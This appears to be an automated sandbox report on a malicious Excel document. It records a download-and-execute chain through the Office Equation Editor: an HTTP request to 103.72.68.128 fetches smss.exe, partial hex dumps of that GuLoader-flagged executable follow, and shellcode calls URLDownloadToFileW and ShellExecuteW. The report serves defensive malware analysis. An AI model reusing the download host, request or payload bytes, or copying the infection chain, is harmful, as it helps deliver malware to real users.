Oct 16, 2023 09:58:28.076838970 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:28.076883078 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:28.076916933 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:28.076958895 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:28.076993942 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:28.077073097 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:28.077110052 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:28.077159882 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:28.077200890 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:28.077251911 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:28.077291965 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:28.077310085 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:28.077343941 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:28.077425003 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:28.077461004 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:28.077519894 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:28.077554941 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:28.077672005 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:28.077749014 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:28.077748060 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:28.077783108 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:28.077791929 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:28.077825069 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:28.077831984 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:28.077866077 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:28.077944994 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:28.077971935 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:28.077984095 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:28.078001022 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:28.078036070 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:28.078068972 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:28.078088999 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:28.078123093 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:28.078154087 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:28.078187943 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:28.078210115 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:28.078243017 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:28.078274965 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:28.078309059 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:28.078399897 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:28.078442097 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:28.078517914 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:28.078552961 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:28.078553915 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:28.078588009 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:28.078685045 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:28.078699112 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:28.078737020 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:28.078737974 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:28.078773975 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:28.078792095 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:28.078825951 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:28.078871965 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:28.078886032 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:28.078908920 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:28.078923941 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:28.078934908 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:28.078974009 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:28.078993082 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:28.079030037 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:28.079042912 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:28.079075098 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:28.079118967 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:28.079147100 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:28.079154015 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:28.079180002 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:28.079199076 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:28.079233885 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:28.079301119 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:28.079335928 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:28.079365969 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:28.079397917 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:28.079400063 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:28.079432011 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:28.079461098 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:28.079490900 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:28.079495907 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:28.079524994 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:28.079557896 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:28.079603910 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:28.079694033 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:28.079732895 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:28.079770088 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:28.079806089 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:28.079869986 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:28.079905033 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:28.079917908 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:28.079951048 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:28.079989910 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:28.080029011 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:28.080035925 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:28.080070019 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:28.080110073 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:28.080147028 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:28.080149889 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:28.080184937 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:28.080234051 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:28.080266953 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:28.080296040 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:28.080331087 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:28.080339909 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:28.080373049 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:28.080401897 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:28.080434084 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:28.080482006 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:28.080493927 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:28.080517054 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:29.193023920 CEST	49164	80	192.168.2.22	103.72.68.128

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 16, 2023 09:57:53.682943106 CEST	138	138	192.168.2.22	192.168.2.255
Oct 16, 2023 09:58:52.718106031 CEST	137	137	192.168.2.22	192.168.2.255
Oct 16, 2023 09:58:53.467312098 CEST	137	137	192.168.2.22	192.168.2.255
Oct 16, 2023 09:58:54.217330933 CEST	137	137	192.168.2.22	192.168.2.255
Oct 16, 2023 09:59:01.693351984 CEST	137	137	192.168.2.22	192.168.2.255
Oct 16, 2023 09:59:02.442749977 CEST	137	137	192.168.2.22	192.168.2.255
Oct 16, 2023 09:59:03.192784071 CEST	137	137	192.168.2.22	192.168.2.255
Oct 16, 2023 09:59:04.456589937 CEST	137	137	192.168.2.22	192.168.2.255
Oct 16, 2023 09:59:05.205929995 CEST	137	137	192.168.2.22	192.168.2.255
Oct 16, 2023 09:59:05.955928087 CEST	137	137	192.168.2.22	192.168.2.255
Oct 16, 2023 09:59:53.384928942 CEST	138	138	192.168.2.22	192.168.2.255
Oct 16, 2023 10:02:49.557529926 CEST	138	138	192.168.2.22	192.168.2.255

HTTP Request Dependency Graph

103.72.68.128

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49164	103.72.68.128	80	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

Timestamp	kBytes transferred	Direction	Data
Oct 16, 2023 09:58:24.132147074 CEST	2	OUT	GET /S1510M/smss.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 103.72.68.128 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	103.72.68.128	80	192.168.2.22	49164	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
Oct 16, 2023 09:58:24.491461992 CEST	3	IN	HTTP/1.1 200 OK Date: Mon, 16 Oct 2023 07:58:22 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.2.34 Last-Modified: Mon, 16 Oct 2023 00:46:09 GMT ETag: "136c20-607cabb6cc4a3" Accept-Ranges: bytes Content-Length: 1272864 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad f1 28 81 e9 90 46 d2 e9 90 46 d2 e9 90 46 d2 2a 9f 19 d2 eb 90 46 d2 e9 90 47 d2 77 90 46 d2 2a 9f 1b d2 e6 90 46 d2 bd b3 76 d2 e3 90 46 d2 2e 96 40 d2 e8 90 46 d2 52 69 63 68 e9 90 46 d2 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 e3 d4 f6 5d 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 60 00 00 00 d0 01 00 00 04 00 00 35 32 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 c0 05 00 00 04 00 00 f5 11 14 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 30 74 00 00 a0 00 00 00 00 a0 03 00 08 1d 02 00 00 00 00 00 00 00 00 00 08 54 13 00 18 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 7d 5f 00 00 00 10 00 00 00 60 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 3e 12 00 00 00 70 00 00 00 14 00 00 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 18 a8 01 00 00 90 00 00 00 04 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 60 01 00 00 40 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 08 1d 02 00 00 a0 03 00 00 1e 02 00 00 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$(FFFFGwFFvF.@FRichFPEL]`52p@@0tTp.text}_` `.rdata>pd@@.datax@.ndata`@.rsrc\|@@
Oct 16, 2023 09:58:24.491503954 CEST	4	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 83 ec 5c 83 7d 0c 0f 74 2b Data Ascii: U\}t+}FEuH7BHPuuur@BSV57BEWPur@eEEPur@}e`p@FRVVU+MM3FQNUMVT
Oct 16, 2023 09:58:24.491516113 CEST	6	IN	Data Raw: e8 c4 fe ff ff e9 f9 14 00 00 53 50 e8 30 3c 00 00 e9 e2 14 00 00 53 e8 2e 16 00 00 83 f8 01 59 89 55 f0 7f 03 33 c0 40 50 ff 15 8c 70 40 00 e9 c4 14 00 00 ff 75 f8 ff 15 44 72 40 00 e9 b6 14 00 00 c1 e0 02 39 5d d4 75 26 8b 88 a0 37 42 00 6a 01 Data Ascii: SP0<S.YU3@Pp@uDr@9]u&7Bj7BYUM7B7B7BwE47B3;#MDa47BV.B5Hr@;tRQE.B;$PQjuPp@
Oct 16, 2023 09:58:24.491529942 CEST	7	IN	Data Raw: 08 7d 0e 56 e8 21 46 00 00 01 45 08 79 03 89 5d 08 8b 45 08 3d 00 04 00 00 0f 8d d3 0f 00 00 88 1c 30 e9 cb 0f 00 00 6a 20 e8 38 11 00 00 6a 31 8b f0 e8 2f 11 00 00 39 5d dc 50 56 75 12 ff 15 18 71 40 00 85 c0 75 7a 8b 45 d4 e9 ad 0f 00 00 ff 15 Data Ascii: }V!FEy]E=0j 8j1/9]PVuq@uzE$q@3GWhVPE`q@t9]tVu$q@u}ZuSjUY;YUu;\|~;sE3xE%jejU}VYUY
Oct 16, 2023 09:58:24.849540949 CEST	8	IN	Data Raw: f0 e8 5a 0c 00 00 6a 22 8b d8 e8 51 0c 00 00 6a 15 8b f8 e8 48 0c 00 00 6a ec e8 38 f5 ff ff 8b 45 dc 89 45 80 8b 45 f8 89 45 84 8b 45 d8 89 45 98 8a 06 f6 d8 1b c0 89 5d 8c 23 c6 89 45 88 8a 07 f6 d8 1b c0 c7 45 94 00 98 42 00 23 c7 89 45 90 8d Data Ascii: Zj"QjHj8EEEEEE]#EEB#E\|P7RE@}uDuESVj1V7;9]tVtD9]\|PW?;tEVq@ jP8C;EtsW?s
Oct 16, 2023 09:58:24.849586964 CEST	10	IN	Data Raw: 45 0a 56 50 ff 75 f0 57 ff 15 3c 71 40 00 80 3e 0a e9 53 f3 ff ff 39 5d dc 8b f2 75 2b 6a 02 e8 76 07 00 00 8b f0 3b f3 0f 84 83 03 00 00 6a 33 e8 25 07 00 00 50 56 ff 15 20 70 40 00 56 8b f8 ff 15 24 70 40 00 eb 16 6a 22 e8 0b 07 00 00 8b 4d dc Data Ascii: EVPuW<q@>S9]u+jv;j3%PV p@V$p@j"MQPV;FuEjEjEjPWES;ED3@uj#Wc;@ujpY@VUXuhWSuBPWuSuu
Oct 16, 2023 09:58:24.849627972 CEST	11	IN	Data Raw: 36 00 00 e9 d8 00 00 00 51 eb 7c 83 c9 ff 2b c8 89 4d d4 74 10 6a 01 e8 16 02 00 00 59 89 55 b4 89 45 d0 eb 10 ff 75 dc 8d 46 18 50 e8 f3 36 00 00 80 4e 09 01 8b 45 d4 8b 4d d0 89 0c 86 39 5d d8 0f 84 99 00 00 00 ff 75 ec e8 56 e8 ff ff e9 8c 00 Data Ascii: 6Q\|+MtjYUEuFP6NEM9]uVS YUD9]t#9]tPJSS`SPW5Q9]t7BM:7BWk6%BS#Qjur@9]tSSuq@E7B3_^[
Oct 16, 2023 09:58:24.849685907 CEST	12	IN	Data Raw: 42 00 68 00 04 00 00 05 e8 03 00 00 56 53 a3 10 37 42 00 ff 15 78 70 40 00 6a 03 68 00 00 00 80 56 e8 6f 2d 00 00 8b f8 83 ff ff 89 7d f4 89 3d 18 90 40 00 75 0a b8 04 91 40 00 e9 d6 01 00 00 56 be 00 9c 42 00 56 e8 b0 31 00 00 56 e8 89 2b 00 00 Data Ascii: BhVS7Bxp@jhVo-}=@u@VBV1V+PhB1SWtp@;A@7B%~;rWS^ =7BuzjESP,Eur}ui}Instu`}softuW}NulluNEE(A
Oct 16, 2023 09:58:24.849895954 CEST	14	IN	Data Raw: 24 38 68 60 01 00 00 50 53 68 c8 ec 41 00 ff 15 78 71 40 00 68 88 91 40 00 68 00 2f 42 00 e8 d3 2c 00 00 ff 15 94 70 40 00 bd 00 90 42 00 50 55 e8 c1 2c 00 00 80 3d 00 90 42 00 22 c7 05 00 37 42 00 00 00 40 00 8b c5 75 0a c6 44 24 14 22 b8 01 90 Data Ascii: $8h`PShAxq@h@h/B,p@BPU,=B"7B@uD$"Bt$P[&P,r@D$ u@8 t8"D$ u@D$"8/@8SuH t:u7B@@@@9uH t:uL$ {
Oct 16, 2023 09:58:24.849910021 CEST	15	IN	Data Raw: 41 00 33 c0 eb 03 83 c8 ff 5e c2 08 00 83 ec 10 53 55 56 8b 35 14 37 42 00 57 6a 02 e8 67 2b 00 00 33 db 3b c3 74 12 ff d0 0f b7 c0 50 68 00 a0 42 00 e8 17 27 00 00 eb 54 bf 08 fd 41 00 53 57 53 68 44 73 40 00 68 01 00 00 80 c6 05 00 a0 42 00 30 Data Ascii: A3^SUV57BWjg+3;tPhB'TASWShDs@hB0BxBs&8AuSWhbs@hs@hU&WhB'@7BB U7B7B!NH;tzVLX7B&BSWRQvD%&B:tT<"u&Bj
Oct 16, 2023 09:58:24.849924088 CEST	16	IN	Data Raw: d9 a3 f0 fc 41 00 75 4d 8b 35 d0 71 40 00 6a 01 57 89 3d 08 37 42 00 ff d6 6a 02 57 a3 04 fd 41 00 ff d6 6a ff 6a 1c 57 a3 d0 ec 41 00 e8 46 03 00 00 ff 35 e8 2e 42 00 6a f2 57 ff 15 88 71 40 00 6a 04 e8 d3 d6 ff ff a3 cc 2e 42 00 33 c0 40 a3 f0 Data Ascii: AuM5q@jW=7BjWAjjWAF5.BjWq@j.B3@A@35@7B;\|>u1Uvt$jUh5.Br@39-.B9.hA@@;D7BujC9-.BD7B9@

Target ID:	0
Start time:	09:58:00
Start date:	16/10/2023
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Imagebase:	0x13f5c0000
File size:	28'253'536 bytes
MD5 hash:	D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	09:58:21
Start date:	16/10/2023
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Imagebase:	0x400000
File size:	543'304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	09:58:27
Start date:	16/10/2023
Path:	C:\Users\user\AppData\Roaming\audiodgse.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\audiodgse.exe"
Imagebase:	0x400000
File size:	1'272'864 bytes
MD5 hash:	6E8215EEE3034D6DCF18D79D397E5715
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.1051412581.00000000087F3000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 32%, ReversingLabs Detection: 32%, Virustotal, Browse
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	09:58:29
Start date:	16/10/2023
Path:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding
Imagebase:	0x12d0000
File size:	2'525'680 bytes
MD5 hash:	2F8D93826B8CBF9290BC57535C7A6817
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	09:58:40
Start date:	16/10/2023
Path:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
Imagebase:	0x1350000
File size:	9'805'808 bytes
MD5 hash:	326A645391A97C760B60C558A35BB068
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	09:58:55
Start date:	16/10/2023
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Imagebase:	0x400000
File size:	543'304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	09:58:57
Start date:	16/10/2023
Path:	C:\Users\user\AppData\Roaming\audiodgse.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\audiodgse.exe"
Imagebase:	0x400000
File size:	1'272'864 bytes
MD5 hash:	6E8215EEE3034D6DCF18D79D397E5715
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

VBA Code

Call Graph

Graph

Entrypoint
Decryption Function
Executed
Not Executed
Show Help

Module: Sheet1

Declaration

Line	Content
1	Attribute VB_Name = "Sheet1"
2	Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True
9	Attribute VB_Name = "Sheet1"
10	Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
11	Attribute VB_GlobalNameSpace = False
12	Attribute VB_Creatable = False
13	Attribute VB_PredeclaredId = True
14	Attribute VB_Exposed = True
15	Attribute VB_TemplateDerived = False
16	Attribute VB_Customizable = True

Module: ThisWorkbook

Declaration

Line	Content
1	Attribute VB_Name = "ThisWorkbook"
2	Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True
9	Attribute VB_Name = "ThisWorkbook"
10	Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
11	Attribute VB_GlobalNameSpace = False
12	Attribute VB_Creatable = False
13	Attribute VB_PredeclaredId = True
14	Attribute VB_Exposed = True
15	Attribute VB_TemplateDerived = False
16	Attribute VB_Customizable = True

Reset < >

Analysis Process: EQNEDT32.EXEPID: 1720, Parent PID: 564COMMON

Execution Graph

Execution Coverage:	4.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	35%
Total number of Nodes:	214
Total number of Limit Nodes:	3

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 035303C0 Relevance: 6.1, APIs: 4, Instructions: 89
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(035303B2), ref: 035303C0

Part of subcall function 035303DA: URLDownloadToFileW.URLMON(00000000,035303EB,?,00000000,00000000), ref: 03530437
Part of subcall function 035303DA: ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 03530475
Part of subcall function 035303DA: ExitProcess.KERNEL32(00000000), ref: 0353048D

Memory Dump Source

Source File: 00000002.00000002.413534624.0000000003530000.00000004.00000020.00020000.00000000.sdmp, Offset: 03530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3530000_EQNEDT32.jbxd

Similarity

API ID: DownloadExecuteExitFileLibraryLoadProcessShell
String ID:
API String ID: 2508257586-0
Opcode ID: 0d2f53907d51cb28d93c57463c93cae89cd214bbc9b63121599eb68b3297a9d5
Instruction ID: f36e6e4c4dbd4b3bdc94c687ca5946bfbaf5a0228bd302cb1d2c49939bb0d039
Opcode Fuzzy Hash: 0d2f53907d51cb28d93c57463c93cae89cd214bbc9b63121599eb68b3297a9d5
Instruction Fuzzy Hash: 9621689294C3C22FDB139B302C6AB65BF246F63104F5989CEE4C30E4E3E2989601C767

Uniqueness

Uniqueness Score: -1.00%

Function 03530342 Relevance: 4.6, APIs: 3, Instructions: 137
filenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

URLDownloadToFileW.URLMON(00000000,035303EB,?,00000000,00000000), ref: 03530437
